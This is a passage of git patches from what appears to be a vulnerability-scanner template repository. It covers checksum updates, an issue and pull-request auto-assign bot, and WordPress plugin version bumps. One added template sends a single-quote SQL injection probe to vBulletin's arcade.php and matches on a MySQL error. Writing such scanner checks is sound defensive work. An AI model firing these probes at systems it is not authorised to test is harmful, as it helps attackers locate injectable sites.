--- a/.new-additions
+++ b/.new-additions
@@ -9,3 +9,4 @@ http/cves/2023/CVE-2023-35844.yaml
http/exposed-panels/axxon-client-panel.yaml
http/exposures/configs/aws-config.yaml
http/exposures/configs/aws-credentials.yaml
+http/misconfiguration/odoo-unprotected-database.yaml
From 7cb3ea9c4f78d72f9ef151fbedc64849af3ed2ab Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Fri, 23 Jun 2023 10:13:48 +0000
Subject: [PATCH 513/670] Auto Generated Templates Checksum [Fri Jun 23
10:13:48 UTC 2023] :robot:
---
templates-checksum.txt | 7 ++++---
1 file changed, 4 insertions(+), 3 deletions(-)
diff --git a/templates-checksum.txt b/templates-checksum.txt
index 717ff63d4b..bca4b16891 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -2490,7 +2490,7 @@ http/exposed-panels/axigen-webmail.yaml:ba82440c440e53659eb0177612f74e9b56e47494
http/exposed-panels/axway-api-manager-panel.yaml:1ba4b61d383a8077d523a78e9f2c9943bbb50d45
http/exposed-panels/axway-securetransport-panel.yaml:7cd833aab3b74c38091e333eaa55e98a17589c87
http/exposed-panels/axway-securetransport-webclient.yaml:0e612d5f82b17f9a730d35cc9cbc04bdadbcc9ba
-http/exposed-panels/axxon-client-panel.yaml:2ee1d2c2cfd0cb61a78b9addfee8300a5742480f
+http/exposed-panels/axxon-client-panel.yaml:ca59521f8b67ad16a73225efa8a3ce53ba885864
http/exposed-panels/azkaban-web-client.yaml:b0276712d02edf19eaf9e29ecf89454f2a082d89
http/exposed-panels/backpack/backpack-admin-panel.yaml:5644c872e82ca09f37a34023f8b8386a59fb0099
http/exposed-panels/barracuda-panel.yaml:652c3079815291186ad0caf04d453c8ff5fdcfd4
@@ -2933,7 +2933,7 @@ http/exposed-panels/o2-easy-panel.yaml:569b78b7d0c9ef7c181c7a0d4cb9d419eabeed7e
http/exposed-panels/ocomon-panel.yaml:5083088a6ed67c065a52d44f2044d2b3c0b45f26
http/exposed-panels/ocs-inventory-login.yaml:606bee9cae4261a0d32a41157ebe9260cb1490ee
http/exposed-panels/octoprint-login.yaml:66fa7ce2f8f0614d3167433ff6e67f27a2b7014b
-http/exposed-panels/odoo-database-manager.yaml:0551cb822fd1b10fc9b80a54710ac7ef8eb813f9
+http/exposed-panels/odoo-database-manager.yaml:ac1bc8b07b40a43b45cc89d5cd219c74841129d4
http/exposed-panels/odoo-panel.yaml:9e407557c8be728d17874042c70f0f03af7c183c
http/exposed-panels/officekeeper-admin-login.yaml:b49875111896a825c77a582e74f7b16a8447cbe8
http/exposed-panels/oipm-detect.yaml:e0a0251b2303ced0f0e4fcf42d9cbbcd51501685
@@ -4080,6 +4080,7 @@ http/misconfiguration/node-exporter-metrics.yaml:b2ac2928da746a40c84fe794caeaa5c
http/misconfiguration/nomad-jobs.yaml:ff399ef954a11469322a4ec944e2bbc61ab61ad5
http/misconfiguration/ntop-panel-exposed.yaml:389ab249b9e71fd45e7cc58a7c35244f9eb1f222
http/misconfiguration/ntopng-traffic-dashboard.yaml:b09ba6388a5425b6722bb49ecde7ad16f8784079
+http/misconfiguration/odoo-unprotected-database.yaml:8489b611976aed298411d5846992107b6903cf53
http/misconfiguration/office365-open-redirect.yaml:298b9e5d05c5f3f48326f0b1ffb739e656d9450d
http/misconfiguration/oneinstack-control-center.yaml:a2bc853b75f313d36ee57e710fa9834e958587aa
http/misconfiguration/openbmcs/openbmcs-secret-disclosure.yaml:df0fbc13935c2cbcd2ed1859cc52b5810085ea59
@@ -6443,7 +6444,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e
ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec
-templates-checksum.txt:28e5734ef3276f9e712d0165107a88786c3e2731
+templates-checksum.txt:9a338c889b767d5ab6c065a25aafbcb8a7ac1cc9
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f
From 8d401ac4c715707dc634308023a75c4631f2edd4 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Fri, 23 Jun 2023 18:04:35 +0530
Subject: [PATCH 514/670] auto-assign bot (#7524)
* auto-assign
* Create assign_tasks.py
* Update auto_assign.yml
* Update assign_tasks.py
---
.github/auto_assign.yml | 4 +-
.github/scripts/assign_tasks.py | 139 +++++++++++++++++++++++++++++++
.github/workflows/autoassign.yml | 30 +++++++
3 files changed, 171 insertions(+), 2 deletions(-)
create mode 100644 .github/scripts/assign_tasks.py
create mode 100644 .github/workflows/autoassign.yml
diff --git a/.github/auto_assign.yml b/.github/auto_assign.yml
index 79ef8a2332..f95bae788b 100644
--- a/.github/auto_assign.yml
+++ b/.github/auto_assign.yml
@@ -1,8 +1,8 @@
# Set to true to add reviewers to pull requests
-addReviewers: true
+addReviewers: false
# Set to true to add assignees to pull requests
-addAssignees: true
+addAssignees: false
# A list of reviewers to be added to pull requests (GitHub user name)
reviewers:
diff --git a/.github/scripts/assign_tasks.py b/.github/scripts/assign_tasks.py
new file mode 100644
index 0000000000..03b35de468
--- /dev/null
+++ b/.github/scripts/assign_tasks.py
@@ -0,0 +1,139 @@
+import requests
+import sys
+import json
+
+# GitHub credentials
+password = sys.argv[3]
+
+repo_owner = "projectdiscovery"
+repo_name = "nuclei-templates"
+pr_user_list = ["DhiyaneshGeek", "pussycat0x", "ritikchaddha"]
+issue_user_list = ["princechaddha", "DhiyaneshGeek", "pussycat0x", "ritikchaddha"]
+
+headers = {'Authorization': f'Bearer {password}',
+ 'Accept': 'application/vnd.github+json',
+ 'X-GitHub-Api-Version': '2022-11-28'}
+
+def get_issue_assignee(issue_number):
+ issue_url = f"https://api.github.com/repos/{repo_owner}/{repo_name}/issues?per_page=2"
+ response = requests.get(issue_url, headers=headers)
+
+ if response.status_code == 200:
+ issue_data = response.json()[1]
+ assignee = issue_data["assignee"]["login"] if issue_data["assignee"] else "None"
+ return assignee
+ else:
+ print(f"Failed to fetch assignee for issue #{issue_number}")
+ return None
+
+def assign_issue_or_pr(user, issue_number):
+ url = f"https://api.github.com/repos/{repo_owner}/{repo_name}/issues/{issue_number}/assignees"
+ data = { "assignees": [user] }
+ response = requests.post(url, headers=headers, data=json.dumps(data))
+
+ if response.status_code == 201:
+ print(f"Assigned issue #{issue_number} to {user}")
+ else:
+ print(f"Failed to assign issue #{issue_number} to {user}. Status code: {response.status_code}")
+
+def get_pr_assignee_and_reviewer(pull_request_number):
+ pull_url = f'https://api.github.com/repos/{repo_owner}/{repo_name}/pulls?per_page=2'
+ response = requests.get(pull_url, headers=headers)
+
+ if response.status_code == 200:
+ pull_request_data = response.json()[1]
+ assignee = pull_request_data['assignee']['login'] if pull_request_data['assignee'] else None
+ reviewers = [reviewer['login'] for reviewer in pull_request_data['requested_reviewers']]
+
+ return assignee, reviewers
+ else:
+ print(f"Failed to retrieve pull request #{pull_request_number}. Response: {response.text}")
+ return None, None
+
+def get_pr_author(pull_request_number):
+ pull_url = f'https://api.github.com/repos/{repo_owner}/{repo_name}/pulls/{pull_request_number}'
+ response = requests.get(pull_url, headers=headers)
+
+ if response.status_code == 200:
+ pull_request_data = response.json()
+ author = pull_request_data['user']['login']
+ return author
+
+ else:
+ print(f"Failed to retrieve pull request #{pull_request_number}. Response: {response.text}")
+ return None
+
+def review_pr(user, pull_request_number):
+ url = f'https://api.github.com/repos/{repo_owner}/{repo_name}/pulls/{pull_request_number}/requested_reviewers'
+ data = { 'reviewers': [user] }
+ response = requests.post(url, headers=headers, data=json.dumps(data))
+
+ if response.status_code == 201:
+ print(f"Review request for pull request #{pull_request_number} sent to {user} successfully.")
+ else:
+ print(f"Failed to send review request for pull request #{pull_request_number}. Response: {response.text}")
+
+def main():
+ if len(sys.argv) != 4:
+ print("Usage: python assign_tasks.py ")
+ sys.exit(1)
+
+ issue_number = int(sys.argv[1])
+ type_ = sys.argv[2]
+ if type_ == 'pr':
+ assignee, reviewers = get_pr_assignee_and_reviewer(issue_number - 1)
+ author = get_pr_author(issue_number)
+
+ if reviewers:
+ try:
+ index = pr_user_list.index(reviewers[0])
+ try:
+ reviewer = pr_user_list[index + 1]
+ except:
+ reviewer = pr_user_list[0]
+ if reviewer == author:
+ reviewer = pr_user_list(pr_user_list.index(reviewer) + 1)
+ review_pr(reviewer, issue_number)
+ else:
+ review_pr(reviewer, issue_number)
+
+ except Exception as e:
+ reviewer = pr_user_list[0]
+ review_pr(reviewer, issue_number)
+ else:
+ for user in pr_user_list:
+ if (user != author):
+ reviewer = user
+ review_pr(reviewer, issue_number)
+ break
+
+ if assignee:
+ try:
+ index = pr_user_list.index(assignee)
+ if (pr_user_list[index + 1] == reviewer):
+ assign_issue_or_pr(pr_user_list[index + 2], issue_number)
+ else:
+ assign_issue_or_pr(pr_user_list[index + 1], issue_number)
+ except Exception as e:
+ if (pr_user_list[0] == reviewer):
+ assign_issue_or_pr(pr_user_list[1], issue_number)
+ else:
+ assign_issue_or_pr(pr_user_list[0], issue_number)
+ else:
+ if (pr_user_list[0] == reviewer):
+ assign_issue_or_pr(pr_user_list[1], issue_number)
+ else:
+ assign_issue_or_pr(pr_user_list[0], issue_number)
+ elif type_ == 'issue':
+ assignee = get_issue_assignee(issue_number-1)
+
+ if assignee:
+ try:
+ index = issue_user_list.index(assignee)
+ assign_issue_or_pr(issue_user_list[index + 1], issue_number)
+ except Exception as e:
+ assign_issue_or_pr(issue_user_list[0], issue_number)
+ else:
+ assign_issue_or_pr(issue_user_list[0], issue_number)
+
+main()
diff --git a/.github/workflows/autoassign.yml b/.github/workflows/autoassign.yml
new file mode 100644
index 0000000000..9517ac8c44
--- /dev/null
+++ b/.github/workflows/autoassign.yml
@@ -0,0 +1,30 @@
+name: run assign_tasks.py
+on:
+ pull_request:
+ branches:
+ - main
+ issues:
+ types: [opened]
+
+jobs:
+ build:
+ permissions: write-all
+ runs-on: ubuntu-latest
+ env:
+ ASSIGN_TASK_TOKEN: ${{ secrets.GITHUB_TOKEN }} # github personal token
+ steps:
+ - name: checkout repo content
+ uses: actions/checkout@v2 # checkout the repository content
+ - name: setup python
+ uses: actions/setup-python@v4
+ with:
+ python-version: '3.10' # install the python version needed
+ - name: install python packages
+ run: |
+ pip install requests
+ - name: execute python script on pr
+ if: ${{ github.event_name == 'pull_request' }}
+ run: python .github/scripts/assign_tasks.py ${{ github.event.pull_request.number }} pr ${{ secrets.GITHUB_TOKEN }}
+ - name: execute python script on issue opened
+ if: ${{ github.event_name == 'issues' }}
+ run: python .github/scripts/assign_tasks.py ${{ github.event.issue.number }} issue ${{ secrets.GITHUB_TOKEN }}
From 13f1caaef75fcfeb95d7c94334297e8e84222a20 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 23 Jun 2023 19:04:13 +0530
Subject: [PATCH 515/670] update info
---
http/exposed-panels/syncserver-panel.yaml | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/http/exposed-panels/syncserver-panel.yaml b/http/exposed-panels/syncserver-panel.yaml
index db6b868a5f..028f288380 100644
--- a/http/exposed-panels/syncserver-panel.yaml
+++ b/http/exposed-panels/syncserver-panel.yaml
@@ -1,14 +1,14 @@
id: syncserver-panel
info:
- name: Symmetricom SyncServer - Panel
+ name: Symmetricom SyncServer Panel - Detect
author: DhiyaneshDk
severity: info
metadata:
max-request: 1
verified: true
shodan-query: html:"Symmetricom SyncServer"
- tags: panel,login,syncserver,symmetricom
+ tags: panel,login,syncserver,symmetricom,detect
http:
- method: GET
From 679e3135ef59b7247996f05422ae6d2fc41fcc23 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Fri, 23 Jun 2023 13:37:32 +0000
Subject: [PATCH 516/670] Auto Generated New Template Addition List [Fri Jun 23
13:37:32 UTC 2023] :robot:
---
.new-additions | 1 +
1 file changed, 1 insertion(+)
diff --git a/.new-additions b/.new-additions
index 4707983113..82f3228a16 100644
--- a/.new-additions
+++ b/.new-additions
@@ -7,6 +7,7 @@ http/cves/2023/CVE-2023-33510.yaml
http/cves/2023/CVE-2023-35843.yaml
http/cves/2023/CVE-2023-35844.yaml
http/exposed-panels/axxon-client-panel.yaml
+http/exposed-panels/syncserver-panel.yaml
http/exposures/configs/aws-config.yaml
http/exposures/configs/aws-credentials.yaml
http/misconfiguration/odoo-unprotected-database.yaml
From c56b0a01ea6826b4cc5ca0711190d13f8192825c Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Fri, 23 Jun 2023 13:37:40 +0000
Subject: [PATCH 517/670] Auto Generated Templates Checksum [Fri Jun 23
13:37:40 UTC 2023] :robot:
---
templates-checksum.txt | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/templates-checksum.txt b/templates-checksum.txt
index bca4b16891..dbb1525fd2 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -3163,6 +3163,7 @@ http/exposed-panels/symantec/symantec-ewep-login.yaml:c12467cdedce8210a2cb11d989
http/exposed-panels/symantec/symantec-iam-console.yaml:6b5f51ea0dffbcb834e8a4e5861c50e643c6bfc8
http/exposed-panels/symantec/symantec-pgp-global-directory.yaml:3d4f1437e6b3c8dcb1b379c08e26ab11bf45f2b5
http/exposed-panels/synapse-mobility-panel.yaml:f41ec14f15af49fe67218ecda8ec11a4d1acbacb
+http/exposed-panels/syncserver-panel.yaml:1b8457c7d6b0c683683afa3757c8d0df244d1963
http/exposed-panels/syncthru-web-service.yaml:02bb50ccaf5240c2b82962554d8f608b9bd5e0bd
http/exposed-panels/synnefo-admin-panel.yaml:f74be29a50a186f60c3cb8ba3957ba38f6356865
http/exposed-panels/synology-rackstation-login.yaml:04f9bfcd16e0d8a943afc51fef7e77c703b25864
@@ -6444,7 +6445,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e
ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec
-templates-checksum.txt:9a338c889b767d5ab6c065a25aafbcb8a7ac1cc9
+templates-checksum.txt:a1d472f4c132a5810a054fa597b32475df6c6c6d
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f
From 724e3500771cab6eef43b88a4e00424027e05e93 Mon Sep 17 00:00:00 2001
From: mastercho
Date: Sat, 24 Jun 2023 02:25:56 +0300
Subject: [PATCH 518/670] Added ardace.php SQL Inj template
---
.../vbulletin/arcade-sql-inj.yaml | 30 +++++++++++++++++++
1 file changed, 30 insertions(+)
create mode 100644 http/vulnerabilities/vbulletin/arcade-sql-inj.yaml
diff --git a/http/vulnerabilities/vbulletin/arcade-sql-inj.yaml b/http/vulnerabilities/vbulletin/arcade-sql-inj.yaml
new file mode 100644
index 0000000000..31a903225e
--- /dev/null
+++ b/http/vulnerabilities/vbulletin/arcade-sql-inj.yaml
@@ -0,0 +1,30 @@
+id: arcade-php-sql-injection
+
+info:
+ name: arcade.php SQL Injection
+ author: MaStErChO
+ severity: high
+ description: |
+ The arcade.php script is vulnerable to SQL injection. By exploiting this vulnerability, an attacker can manipulate the SQL queries executed by the script, potentially gaining unauthorized access to the database.
+
+ reference:
+ - https://www.exploit-db.com/exploits/29604
+ - https://github.com/OWASP/vbscan/
+
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/arcade.php?act=Arcade&do=stats&comment=a&s_id=1'"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "mySQL error"
+
+ - type: status
+ status:
+ - 200
+
From 4a72d355d545d69275316fd48b9bc25ec42386c9 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Sat, 24 Jun 2023 04:02:24 +0000
Subject: [PATCH 519/670] Auto WordPress Plugins Update [Sat Jun 24 04:02:24
UTC 2023] :robot:
---
helpers/wordpress/plugins/fluentform.txt | 2 +-
helpers/wordpress/plugins/the-events-calendar.txt | 2 +-
http/technologies/wordpress/plugins/ad-inserter.yaml | 1 -
http/technologies/wordpress/plugins/add-to-any.yaml | 1 -
http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 -
http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 -
http/technologies/wordpress/plugins/akismet.yaml | 1 -
.../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 -
http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 -
.../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 -
.../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 -
http/technologies/wordpress/plugins/amp.yaml | 1 -
http/technologies/wordpress/plugins/antispam-bee.yaml | 1 -
http/technologies/wordpress/plugins/astra-sites.yaml | 1 -
http/technologies/wordpress/plugins/astra-widgets.yaml | 1 -
http/technologies/wordpress/plugins/autoptimize.yaml | 1 -
http/technologies/wordpress/plugins/backwpup.yaml | 1 -
http/technologies/wordpress/plugins/better-search-replace.yaml | 1 -
http/technologies/wordpress/plugins/better-wp-security.yaml | 1 -
.../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 -
http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 -
http/technologies/wordpress/plugins/breeze.yaml | 1 -
http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 -
.../wordpress/plugins/child-theme-configurator.yaml | 1 -
http/technologies/wordpress/plugins/classic-editor.yaml | 1 -
http/technologies/wordpress/plugins/classic-widgets.yaml | 1 -
.../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 -
http/technologies/wordpress/plugins/cloudflare.yaml | 1 -
http/technologies/wordpress/plugins/cmb2.yaml | 1 -
http/technologies/wordpress/plugins/coblocks.yaml | 1 -
http/technologies/wordpress/plugins/code-snippets.yaml | 1 -
http/technologies/wordpress/plugins/coming-soon.yaml | 1 -
http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 -
.../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 -
http/technologies/wordpress/plugins/contact-form-7.yaml | 1 -
http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 -
http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 -
http/technologies/wordpress/plugins/cookie-notice.yaml | 1 -
http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 -
.../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 -
http/technologies/wordpress/plugins/custom-css-js.yaml | 1 -
http/technologies/wordpress/plugins/custom-fonts.yaml | 1 -
http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 -
http/technologies/wordpress/plugins/disable-comments.yaml | 1 -
http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 -
http/technologies/wordpress/plugins/duplicate-page.yaml | 1 -
http/technologies/wordpress/plugins/duplicate-post.yaml | 1 -
http/technologies/wordpress/plugins/duplicator.yaml | 1 -
.../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 -
http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 -
http/technologies/wordpress/plugins/easy-google-fonts.yaml | 1 -
http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 -
http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 -
http/technologies/wordpress/plugins/elementor.yaml | 1 -
http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 -
http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 -
http/technologies/wordpress/plugins/envato-elements.yaml | 1 -
.../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 -
http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 -
.../wordpress/plugins/facebook-for-woocommerce.yaml | 1 -
http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 -
.../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 -
http/technologies/wordpress/plugins/flamingo.yaml | 1 -
http/technologies/wordpress/plugins/fluentform.yaml | 1 -
http/technologies/wordpress/plugins/font-awesome.yaml | 1 -
.../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 -
http/technologies/wordpress/plugins/formidable.yaml | 1 -
http/technologies/wordpress/plugins/forminator.yaml | 1 -
http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 -
http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 -
.../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 -
.../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 -
.../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 -
http/technologies/wordpress/plugins/google-site-kit.yaml | 1 -
.../wordpress/plugins/google-sitemap-generator.yaml | 1 -
http/technologies/wordpress/plugins/gtranslate.yaml | 1 -
http/technologies/wordpress/plugins/gutenberg.yaml | 1 -
http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 -
.../wordpress/plugins/header-and-footer-scripts.yaml | 1 -
.../wordpress/plugins/header-footer-code-manager.yaml | 1 -
.../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 -
http/technologies/wordpress/plugins/header-footer.yaml | 1 -
http/technologies/wordpress/plugins/health-check.yaml | 1 -
http/technologies/wordpress/plugins/hello-dolly.yaml | 1 -
http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 -
http/technologies/wordpress/plugins/imagify.yaml | 1 -
http/technologies/wordpress/plugins/imsanity.yaml | 1 -
.../wordpress/plugins/insert-headers-and-footers.yaml | 1 -
http/technologies/wordpress/plugins/instagram-feed.yaml | 1 -
.../wordpress/plugins/intuitive-custom-post-order.yaml | 1 -
http/technologies/wordpress/plugins/iwp-client.yaml | 1 -
http/technologies/wordpress/plugins/jetpack.yaml | 1 -
http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 -
http/technologies/wordpress/plugins/kirki.yaml | 1 -
http/technologies/wordpress/plugins/leadin.yaml | 1 -
.../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 -
http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 -
http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 -
http/technologies/wordpress/plugins/loco-translate.yaml | 1 -
http/technologies/wordpress/plugins/loginizer.yaml | 1 -
http/technologies/wordpress/plugins/loginpress.yaml | 1 -
.../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 -
http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 -
http/technologies/wordpress/plugins/mailpoet.yaml | 1 -
http/technologies/wordpress/plugins/maintenance.yaml | 1 -
http/technologies/wordpress/plugins/mainwp-child.yaml | 1 -
http/technologies/wordpress/plugins/malcare-security.yaml | 1 -
http/technologies/wordpress/plugins/megamenu.yaml | 1 -
http/technologies/wordpress/plugins/members.yaml | 1 -
http/technologies/wordpress/plugins/meta-box.yaml | 1 -
http/technologies/wordpress/plugins/ml-slider.yaml | 1 -
http/technologies/wordpress/plugins/newsletter.yaml | 1 -
.../wordpress/plugins/nextend-facebook-connect.yaml | 1 -
http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 -
http/technologies/wordpress/plugins/ninja-forms.yaml | 1 -
http/technologies/wordpress/plugins/ocean-extra.yaml | 1 -
.../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 -
http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 -
http/technologies/wordpress/plugins/optinmonster.yaml | 1 -
http/technologies/wordpress/plugins/otter-blocks.yaml | 1 -
http/technologies/wordpress/plugins/password-protected.yaml | 1 -
http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 -
http/technologies/wordpress/plugins/photo-gallery.yaml | 1 -
http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 -
http/technologies/wordpress/plugins/polylang.yaml | 1 -
http/technologies/wordpress/plugins/popup-builder.yaml | 1 -
http/technologies/wordpress/plugins/popup-maker.yaml | 1 -
http/technologies/wordpress/plugins/post-smtp.yaml | 1 -
http/technologies/wordpress/plugins/post-types-order.yaml | 1 -
.../wordpress/plugins/premium-addons-for-elementor.yaml | 1 -
http/technologies/wordpress/plugins/pretty-link.yaml | 1 -
http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 -
http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 -
http/technologies/wordpress/plugins/redirection.yaml | 1 -
http/technologies/wordpress/plugins/redux-framework.yaml | 1 -
http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 -
http/technologies/wordpress/plugins/safe-svg.yaml | 1 -
http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 -
http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 -
http/technologies/wordpress/plugins/sg-security.yaml | 1 -
http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 -
.../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 -
.../wordpress/plugins/simple-custom-post-order.yaml | 1 -
http/technologies/wordpress/plugins/siteguard.yaml | 1 -
http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 -
http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 -
http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 -
.../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 -
http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 -
http/technologies/wordpress/plugins/svg-support.yaml | 1 -
http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 -
http/technologies/wordpress/plugins/tablepress.yaml | 1 -
http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 -
http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 -
http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 -
http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 -
.../wordpress/plugins/translatepress-multilingual.yaml | 1 -
.../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 -
.../technologies/wordpress/plugins/under-construction-page.yaml | 1 -
http/technologies/wordpress/plugins/updraftplus.yaml | 1 -
http/technologies/wordpress/plugins/use-any-font.yaml | 1 -
http/technologies/wordpress/plugins/user-role-editor.yaml | 1 -
.../wordpress/plugins/velvet-blues-update-urls.yaml | 1 -
http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 -
.../wordpress/plugins/webp-converter-for-media.yaml | 1 -
http/technologies/wordpress/plugins/webp-express.yaml | 1 -
.../wordpress/plugins/widget-importer-exporter.yaml | 1 -
.../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 -
.../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 -
http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 -
.../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 -
.../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 -
http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 -
.../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 -
.../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 -
http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 -
http/technologies/wordpress/plugins/woocommerce.yaml | 1 -
http/technologies/wordpress/plugins/wordfence.yaml | 1 -
http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 -
http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 -
http/technologies/wordpress/plugins/worker.yaml | 1 -
http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 -
http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 -
http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 -
http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 -
http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 -
http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 -
http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 -
http/technologies/wordpress/plugins/wp-optimize.yaml | 1 -
http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 -
http/technologies/wordpress/plugins/wp-reset.yaml | 1 -
http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 -
http/technologies/wordpress/plugins/wp-smushit.yaml | 1 -
http/technologies/wordpress/plugins/wp-statistics.yaml | 1 -
http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 -
http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 -
http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 -
http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 -
http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 -
http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 -
http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 -
.../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 -
202 files changed, 2 insertions(+), 202 deletions(-)
diff --git a/helpers/wordpress/plugins/fluentform.txt b/helpers/wordpress/plugins/fluentform.txt
index 32f3eaad0d..3e827a3a10 100644
--- a/helpers/wordpress/plugins/fluentform.txt
+++ b/helpers/wordpress/plugins/fluentform.txt
@@ -1 +1 @@
-5.0.1
\ No newline at end of file
+5.0.2
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/the-events-calendar.txt b/helpers/wordpress/plugins/the-events-calendar.txt
index 4de0b707f6..9734e120ae 100644
